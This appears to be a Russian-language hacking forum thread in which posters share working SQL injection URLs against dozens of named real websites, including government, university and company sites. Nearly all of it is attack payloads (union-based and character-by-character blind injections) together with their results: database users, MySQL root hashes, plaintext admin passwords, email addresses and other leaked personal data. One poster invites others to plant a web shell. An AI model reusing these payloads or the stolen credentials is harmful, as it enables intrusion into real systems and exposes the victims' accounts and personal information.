:test:098f6bcd4621d373cade4e832627b4f6 : lucas2@tablexi.com хэш MD5 : 098f6bcd4621d373cade4e832627b4f6 : test
:mlineen:0c6b9675c57f02bac9ecbe87f8e0f07b : matt@tablexi.com
:dan1:b3fd72d19e3a844c7654951596467521 : dan@tablexi.com
:abel:ebdada7950078902a3d35860d9d0952d : agborlongan@hotmail.com


И так 41 тыщщщааа -)

Эх тока четвертые версии =)
http://www.itapoa.sc.gov.br/preg.php?cat=-1%20union%20select%201,2,3,version(),5,6,7,8%20--
http://www.vniispk.ru/apple.php?key=-1%20union%20select%201,2,3,version(),5--

http://phillygaycalendar.com/pages/col.php?id=-293+union+select+1,2,3,4,version(),6,7,8/*

4.0.27-max-log

PR: 4

http://www.cultura2007.ro/document.php?doc=-3+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user()),6,7,8,9/*


Database Version: 5.0.22-community-nt
Database name: cultura2007-ro
User name: root@localhost

http://www.pev-geneve.ch/pages/col.php?id=-82+union+select+1,2,3,4,5,6,7,8,version()/*

4.1.22-standard

http://www.media-desk.ro/document.php?doc=-9+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,version( ),database(),user()),8,9/*


Database Version: 5.0.22-community-nt
Database name: mediadesk_ro
User name: root@localhost

Ипотека
www.vrx.ru
Тиц: 1300
PR: 4
Полная информация о сотрудниках, начиная от логина/пасса на сайте, заканчивая домашним телом:
http://www.vrx.ru/ipoteka/bank.php?id=-8+union+select+1,concat_ws(0x3a,ID,DATE_REG,IPADRE SS,AGENT,AGENT_TYPE,IDFIRM,LOGIN,PASS,MAILS,MAIL_P UBLIC,PHONE_AGENT,CONTACT_AGENT,BIRTHDAY,POL,IDSTA TUS,ABOUT,OPEN,ACTIV_CODE),3,4,5,6,7,8,9,10,11+fro m+users--
http://www.vrx.ru/ipoteka/bank.php?id=-8+union+select+1,concat_ws(0x3a,ID,NAME,MAILS,LOG, PASS,PHONE,ADR,FIRM,STATUS,JOB,THEMES),3,4,5,6,7,8 ,9,10,11+from+v_users--

Админка:admin/ не доступна...

http://www.politia6.ro/document.php?doc=-240+UNION+SELECT+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9--


Database Version: 5.0.67-log
Database name: politia6_db
User name: polcom6@208.113.189.79

Аудиторська Фірма СЕНТАН
www.audit.uz.ua
Тиц:1400
PR:4
http://www.audit.uz.ua/ukr/news.php?id=-4+union+select+1,2,concat_ws(0x3a,id,name_i,login_ i,password_i,email,is_admin,uid,applied),4,5,6,7,8 ,9,10,11,12,13,14,15,16,17+from+usrs--
логин/пасс:
admin:230178
-------------------------------------------
The End!

http://www.inforom-cultural.org/hermann/document.php?doc=-3+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_ WS(0x3a,version(),database(),user()),0x71),0x71),4 ,5,6,7,8,9



Database Version: 4.1.18-nt
Database name: hermann_ro
User name: hermann@localhost

PageRank: 4

http://www.inportdover.com/ssm/shop/view_c.php?c_id=-18+union+select+1,group_concat(user_login,0x3a,use r_pass),3+from+users--

admin:21232f297a57a5a743894a0e4a801fc3:admin

Database Version: 5.0.32-Debian_7etch8-log
Database name: inportdover_ssm
User name: inportdover_web@localhost

http://www.housexpert.ro/document.php?doc=-492+union+select+1,2,3,4,concat_ws(0x3a,version(), database(),user()),6,7,8,9


Database Version: 5.0.67-log
Database name: housexpert_basic
User name: danco@goober.dreamhost.com


http://www.housexpert.ro/document.php?doc=-492+UNION+SELECT+1,2,CONCAT_WS(0x3a,id,name,userna me,email,password),4,5,6,7,8,9+FROM+hass.jos_users

62:Administrator:admin:daniel.ionescu@hass.ro:8dfd 8ac0990c9d9f3e2c7f833121aaef

pass: creation

admin panel - not found.

http://www.bekkin.ru

юзер:
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 1,1)))=109 m
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 2,1)))=121 y
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 3,1)))=115 s
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 4,1)))=113 q
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 5,1)))=108 l
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 6,1)))=98 b
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 7,1)))=101 e
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 8,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 9,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 10,1)))=105 i
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 11,1)))=110 n
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 12,1)))=64 @
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 13,1)))=108 l
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 14,1)))=111 o
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 15,1)))=99 c
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 16,1)))=97 a
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 17,1)))=108 l
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 18,1)))=104 h
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 19,1)))=111 o
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 20,1)))=115 s
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 21,1)))=116 t
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(user(), 22,1)))=0

бд:
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),1,1)))=98 b
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),2,1)))=101 e
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),3,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),4,1)))=107 k
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),5,1)))=105 i
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),6,1)))=110 n
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(databas e(),7,1)))=0

Версия MySQL:
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),1,1)=3 3
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version (),2,1)))=46 .
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),3,1)=2 2
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),4,1)=3 3
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version (),5,1)))=46 .
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),6,1)=5 5
http://www.bekkin.ru/index.php?rub=11+and+substring(version(),7,1)=8 8
http://www.bekkin.ru/index.php?rub=11+AND+ascii(lower(substring(version (),8,1)))=0

http://unixdows.com/cms/php.php?id=-1%20union%20select%20version(),%20concat_ws(0x3a,u ser_id,user_password%20)%20from%20tbl_auth_user--
http://www.ihf-hr.org/cms/cms.php?sec_id=1&pag_id=-4%20union%20select%20version()--

http://www.smartcall.ro/document.php?doc=-7+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_ WS(0x3a,Version(),Database(),User()),0x71),0x71),4 ,5,6,7,8,9--

Database Version: 5.0.18
Database name: smartcall
User name: smartcall@localhost

[0]:1:dima:dima@smartcall.ro:ebb934cccce0cbe48e5b0173 98807a46
[1]:2:Saficus:catalin.sarafoleanu@smartcall.ro:5d0f13 929ca7be7812e00cf0353bac1d
[2]:3:alx:alexandru.albu@smartcall.ro:8ae4f4568bcc10b 12d8ececaf24ade76


[0]:43:j:20050082:40250776460:k:k
[1]:44:d:20050082:40250776460:k:k
[2]:45:l:20050082:40250776460:s:s
[3]:46:l:20050082:40250776460:k:k
[4]:47:albu alexandru:3333:40212601289:alexandru.albu@smartcal l.ro:nuamparola
[5]:48:Print Pack Prod:90:40214608399:liviu.micu@smartcall.ro:print

http://www.bkreml.ru

юзер:
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),1,1)))=' 109 m
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),2,1)))=' 97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),3,1)))=' 120 x
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),4,1)))=' 105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),5,1)))=' 98 b
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),6,1)))=' 105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),7,1)))=' 116 t
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),8,1)))=' 95 _
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),9,1)))=' 107 k
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),10,1)))= '97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),11,1)))= '122 z
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),12,1)))= '97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),13,1)))= '110 n
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),14,1)))= '64 @
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),15,1)))= '108 l
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),16,1)))= '111 o
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),17,1)))= '99 c
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),18,1)))= '97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),19,1)))= '108 l
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),20,1)))= '104 h
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),21,1)))= '111 o
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),22,1)))= '115 s
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),23,1)))= '116 t
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(user(),24,1)))= '0

бд:
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),1,1) ))='109 m
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),2,1) ))='96 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),3,1) ))='120 x
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),4,1) ))='105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),5,1) ))='98 b
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),6,1) ))='105 i
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),7,1) ))='116 t
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),8,1) ))='95 _
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),9,1) ))='107 k
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),10,1 )))='97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),11,1 )))='122 z
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),12,1 )))='97 a
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),13,1 )))='110 n
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(database(),14,1 )))='0

версия MySQL:
http://www.bkreml.ru/?page=5'+and+substring(version(),1,1)='3 3
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),2,1)) )='46 .
http://www.bkreml.ru/?page=5'+and+substring(version(),3,1)='2 2
http://www.bkreml.ru/?page=5'+and+substring(version(),4,1)='3 3
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),5,1)) )='46 .
http://www.bkreml.ru/?page=5'+and+substring(version(),6,1)='4 4
http://www.bkreml.ru/?page=5'+and+substring(version(),7,1)='4 4
http://www.bkreml.ru/?page=5'+AND+ascii(lower(substring(version(),8,1)) )='0

www.condi.ru PageRank: 4 тИЦ: 450

http://www.condi.ru/news.php?news_id=-7+union+select+1,2,unhex(hex(concat_ws(user(),vers ion(),database()))),4,5

alink@localhost:4.1.18-log:condi

www.zsk.ru PageRank: 5 тИЦ: 350

http://www.zsk.ru/news.php?newsid=32+union+select+1,2,3,4,concat_ws( 0x3A,version(),user(),database()),6,7,8,9,10,11,12 ,13--


З.Ы. кандидаты в антибоян.

Ещё одна крупная компания -) Берём рута

http://www.vero-software.com/news_detail.php?id=180980980983+union+select+1,2,c oncat_ws(0x3a,version(),user(),database()),4,5,6--

Database Version: 5.0.45-community-nt
Database name: vero_english
User name: root@localhost

Берём юзеров с мускула! Он один. Ах как обидно -)

http://www.vero-software.com/news_detail.php?id=180980980983+UNION+SELECT+1,2,A ES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT( User,0x3a,Password)+FROM+mysql.user+LIMIT+0,1),0x3 a),0x71),0x71),4,5,6--

: root : *4F94E0B0F39112E823AFC0BFA211C72E2897226F

Бегаем везде по разным сервисам но почему то облом не брутится -(.И опять не обидно есть читалка. Ведь file priv хорошо говорит всё -)

PR4

http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,5,6--
+
http://www.speedreading.com/ - PR3
http://www.rocketreader.com/ - PR5

Database Version: 5.0.45-community
Database name: ebook_genre
User name: root@localhost

http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(name,0x3a,pass),6+fr om+drupal.users+limit+0,1--
http://www.freeonlinebooks.org/admin/
admin:b8ad16f54966251f85263ca612dbb705
maya:c8772558781f513ea51a2312e8d1346a

http://www.rocketreader.com/login.php
portaladmin@rocketreader.com:jim234be

http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword),6+from+freeonlinebooks_forums.phpbb_users +limit+1,1--
от форума freeonlinebooks:
http://www.freeonlinebooks.org/forums/ucp.php?mode=login
speed:$H$9.Z3lXp2zBIoIY5hyIFoFtnzNBCyAa/ (в другой базе нашел пасс seagull692)

http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(username,0x3a,user_p assword),6+from+speed_speedreading.phpbb_users+lim it+1,1--
форум speedreading:
http://www.speedreading.com/phpBB2/index.php


http://www.freeonlinebooks.org/displaybook1.php?chapter_id=7&id=-1+union+select+1,2,3,4,concat(User,0x3a,Password), 6+from+mysql.user+limit+0,1--
root:*5D81277EE8B4D2F2C50DA72812A9C12AF9A2DF3E

Еще хз откуда пароли, пока писал, уже забыл, но думаю вам не составит труда найти:

admin:testrocket
amjith:amjith

http://www.songlines.co.uk/topoftheworld/top-of-the-world.php?id=-37+union+select+1,2,version(),4,5,6,7,8/*

4.1.22

http://pr-cy.ru/images/styles/1/6.gif

http://www.geo.edu.ro/sgr/article.php?sid=-125+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8--


Database Version: 4.0.18
Database name: sgr
User name: root@localhost


Found mysql.users with columns user, password

Found users with columns email,name,uname,uid,pass

пр6
http://www.realityofaid.org/news.php?id=-1+union+select+1,2,3,4,5,6--

5 ветка

есл зальете шелл напишите в личку=)

http://travel.colacotwayweb.com.au/world.php?cat=-1003+union+select+1,2,table_name+from+information_ schema.tables+limit+1,1--

ничего интересного..

5.0.67-community

http://www.sierra-tech.com/word.php?id=-6+union+select+1,2,3,4,5,version()/*

4.1.12

http://www.asic-cafe.org/htm/CSA/word.php?id=-10+union+select+1,2,version(),4,5,6/*
советую глянуть эту скулю)) ;)

4.1.21

Pr 6 Nas a.gov
http://ares.jsc.na sa.gov/_Includes/People.cfm?ID=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22+from+dbo_tblKABranches

Докручивайте сами =)

High Quality Asian Market


http://lotteplaza.com/product/product_view.php?lan=ENG&Category=58&id=8679879800970+union+select+1,2,3,4,5,concat_ws( 0x3a,version(),user(),database()),7,8,9,10,11,12,1 3,14,15,16,17,18,19,20,21,22,23,24--


Database Version: 5.0.24-standard
Database name: lottepla
User name: lottepla@67.59.151.227


Берём дядю админа


http://lotteplaza.com/product/product_view.php?lan=ENG&Category=58&id=8679879800970+UNION+SELECT+1,2,3,4,5,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(email,0x3 a,username,0x3a,password,0x3a,active)+FROM+lottepl a.admins+LIMIT+0,1),0x3a),0x71),0x71),7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24--

Fields email : username : password : active

: arsman@arsman.com : LotteOFFLIMITS : adminOFFLIMITS : 1



Много софта

http://www.gearsbox.com/product.php?id=798765519481+union+select+1,2,3,4,5 ,6,7,concat_ws(0x3a,version(),user(),database()),9 ,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--


Database Version: 5.0.45-log
Database name: gears_box
User name: vovka@cgi1303.int.bizland.net


Много пользователей -) пассы в чистом виде.

http://www.gearsbox.com/product.php?id=798765519481+UNION+SELECT+1,2,3,4,5 ,6,7,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+C ONCAT(e_mail,0x3a,PASSWORD)+FROM+gears_box.authors +LIMIT+0,1),0x3a),0x71),0x71),9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23,24,25--

Fields e_mail:PASSWORD

: info@UnusualWorks.com : yqMbtyxQ
: admin@cyber-webcom.com : rC7Zy6L9
: meanfox@meanfox.com : KtQNPnK6
: dstep@mail.uln.ru : WHZL3MjZ
: contact@audio-converter.com : ExAzwyPm

http://sportsbuilders.org/page.php?id=-125'+union+select+1,2,3,4,5,6,7,8,9,10,11,version( ),13,14,15,16,17/*

4.1.22-standard-log
PR: 4

http://mojetesty.pl/content/slownik/word.php?id=-3924+union+select+1,version(),3,4,5,6,7,8--

5.0.51-2+tld2-log

PR: 3

Выложил: на antichat http://www.kbs-spritztechnik.com/cms.php?pageId=-2%20union%20select%20group_concat(table_name)%20fr om%20information_schema.tables--

jokester: у меня такое ощущение, что всем пофигу на правила, я в предыдущем твоём посте удалил bluebit.com.au с комментарием "БОЯН", и ты постишь его в этом. Это такая новая игра, а вдруг модератор не увидет?

http://depts.washington.edu/mcb/facultyinfo.php?id=-18+union+select+1,2,3,version(),5,6,7,8,9,0,1,2,3, 4,5,6,7,8--

Database Version: 5.0.27-standard
Database name: facultyinfo
User name: lowpriv@depts01.u.washington.edu

User:Password
root:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
root:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
lowpriv:451751d513d92913
lowpriv:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57
root:*6675DCAFB4890C1A36E2CC2BE39023A6C1258C57

FEDERAL GOVERNMENT OF NIGERIA

http://www.customs.gov.ng/Services/news_results.php?NewsID=180987663+union+select+1,2 ,concat_ws(0x3a,version(),user(),database()),4--

Database Version: 5.0.45
Database name: CONTENTS
User name: contents@localhost


http://www.vesmirweb.net/clanek.php?id=46789655443904+union+select+1,concat _ws(0x3a,version(),user(),database()),3,4,5,6,7,8, 9,10,11,12,13,14--

5.0.24a-Debian_9-log
vesmirweb@localhost
vesmirweb

http://www.randersen.dk/privat/test/asd.php?todo=edit&id=-2+union+select+version(),2/*

5.0.32-Debian_7etch8-log

ппц там медленно все..

http://www.africasia.com/themiddleeast/me.php?ID=-1973+union+select+version(),2,3,4,5,6,7,8,9/*

4.1.20-log

PR: 6

http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),databa se(),user()),4,5/*


Version: 5.0.22-Debian_0ubuntu6.06.10-log
Database : isj
User : isj@localhost

http://www.cashmerewholesalecentre.com/product.php?cid=-100'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws(0 x3a,version(),database(),user()),12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35/*


Database Version: 4.1.22-community-nt
Database name: akee
User name: akee@localhost


Found table login with columns id,password,username

Have fun...

http://www.rtos.com/page/product.php?id=-6+union+select+1,2,concat(version(),0x3a,database( ),0x3a,user()),4--
version(): 4.1.20-log
user(): expresslogic@216.119.112.142
database(): expresslogic
ТИЦ = 30



http://nlsod.ru/?d=o_company&f=company&id=-6+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),user+from+mysql.user+limit+0,1--

version(): 5.0.33
user(): root@localhost
database(): 1gb_nlsoddb
ТИЦ = 30



http://www.svadbaexpo.ru/index.php?id=-6+union+select+1,concat(version(),0x3a,user(),0x3a ,database()),3--
version(): 4.1.20-log
user(): dbu_tours_1@192.168.5.21
database(): db_tours_3
ТИЦ = 100

http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,ver sion(),database(),user()),43,44,45,46,47,48,49,50, 51,52,53,54,55,56,57,58,59,60,61/*

Database Version: 4.0.20
Database name: piatadesoft
User name: root@localhost



http://www.piatadesoft.ro/public.php?vreau=infoprog&offset=19&go=40&prog=-2716+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,use r,password),43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61+FROM+mysql.user/*

root:6ac227d531f5e2da

Электронная библиотека.

http://kamonline.ru/index.php?action=viewcat&num=-1+union+select+concat(login,0x3a,passwd)+from+user s--

mailbrush,

Не понял, это таже самая инъекция, зачем её баянить?

http://www.facilities.upenn.edu/mapsBldgs/view_map.php3?id=-44+union+select+1,2,3,4,version(),6,7,8,9,10,11--

http://www.photokzn.ru

так находим таблицу с пользователями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FR OM+information_schema.tables+WHERE+table_name+like +char(37,117,115,101,114,37)+limit+2,1),1,1))='117 = u
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FR OM+information_schema.tables+WHERE+table_name+like +char(37,117,115,101,114,37)+limit+2,1),2,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FR OM+information_schema.tables+WHERE+table_name+like +char(37,117,115,101,114,37)+limit+2,1),3,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FR OM+information_schema.tables+WHERE+table_name+like +char(37,117,115,101,114,37)+limit+2,1),4,1))='114 = r
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FR OM+information_schema.tables+WHERE+table_name+like +char(37,117,115,101,114,37)+limit+2,1),5,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+table_name+FR OM+information_schema.tables+WHERE+table_name+like +char(37,117,115,101,114,37)+limit+2,1),6,1))='0
таблица users


находим колонку с паролями:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+3,1),1,1))='112 = p
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+3,1),2,1))='97 = a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+3,1),3,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+3,1),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+3,1),5,1))='0
колонка pass


находим колонку с логинами:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+2,1),1,1))='108 = l
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+2,1),2,1))='111 = o
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+2,1),3,1))='103 = g
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+2,1),4,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+2,1),5,1))='110 = n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+column_name+F ROM+information_schema.columns+WHERE+table_name=0x 7573657273+limit+2,1),6,1))='0
колонка login

Теперь вывод логина:
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+us ers+limit+0,1),1,1))='97 a
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+us ers+limit+0,1),2,1))='100 d
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+us ers+limit+0,1),3,1))='109 m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+us ers+limit+0,1),4,1))='105 i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+us ers+limit+0,1),5,1))='110 n
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+login+FROM+us ers+limit+0,1),6,1))='0
логин админа - admin


вывод пароля из users где имя пользователя admin;)
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),1,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),2,1))='104 = h
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),3,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),4,1))='115 = s
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),5,1))='116 = t
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),6,1))='105 = i
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),7,1))='109 = m
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),8,1))='101 = e
http://www.photokzn.ru/?cat=new&id=3931'+and+ascii(substring((SELECT+pass+FROM+use rs+where+login=0x61646d696e),9,1))='0
пароль админа thistime

P.s. Там на сайте 5 версия MySQL, можно было бы провести иньекцию по другому, но я не ищу легких путей!!!!=))

Медиа-уроки

http://media-lessons.com/video/-148+union+select+1,2,3,4,5,6,7+from+phpbb_users--

http://www.jvc.ro/product.php?id=EX-A10E&catid=100030[SQLINJ]


Version : PostgreSQL
Current_database : jvc-ro
Current_user: ppo


З.Ы. Уязвимы все сайты JVC в мире, сделаны они по одной и той же технологии только имена доменов разные и язык на котором предоставлена информация.
Скуля слепая... не раскручивал, кому интересно могу помочь

apps.detnews.com

Pr 6

http://apps.detnews.com/apps/history/index.php?id=-14+union+select+1,2,concat_ws(0x3a,user,password), 4,5,6,7,8,9,0,1,2,3,4+from+mysql.user

root:41221e5672a06384
johnd:2dd99728002374de
tdn:41221c6172a0658f
tdn:134e3e414b6b964f
jdaven:2dd99728002374de
ien:475dc867159e96ef
drupal_user:79bd7cfe7e82fdf1

http://www.aectra.ro/product.php?prod_id=-186+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(C ONCAT_WS(0x3a,Version(),Database(),User()),0x71),0 x71),6,7,8,9,10,11,12,13/*


Database Version: 4.1.11-Debian_4sarge7-log
Database name: aectra
User name: aectra@localhost

wap.116.ru

http://wap.116.ru/mobile/mobile.php?cmd=listbr&target=0&sost=-1'+group+by+1+union+select+1,concat_ws(0x3a,versio n(),database(),user())+--+
юзер - wap_116@10.80.12.52
бд - wap_116
версия MySQL - 5.0.51b-log
www.heaven-house.kz
http://www.heaven-house.kz/index.php?part=catalogue&item_type_id=10+union+select+1,2,3,concat_ws(0x3a, version(),user(),database()),5,6,7,8,9,10,11,12,13 ,14,15,16,17+--+
юзер - u51572@10.10.223.216
бд - u51572
версия MySQL - 5.0.67-log

выводятся все таблицы сразу, limit даже не нужен)
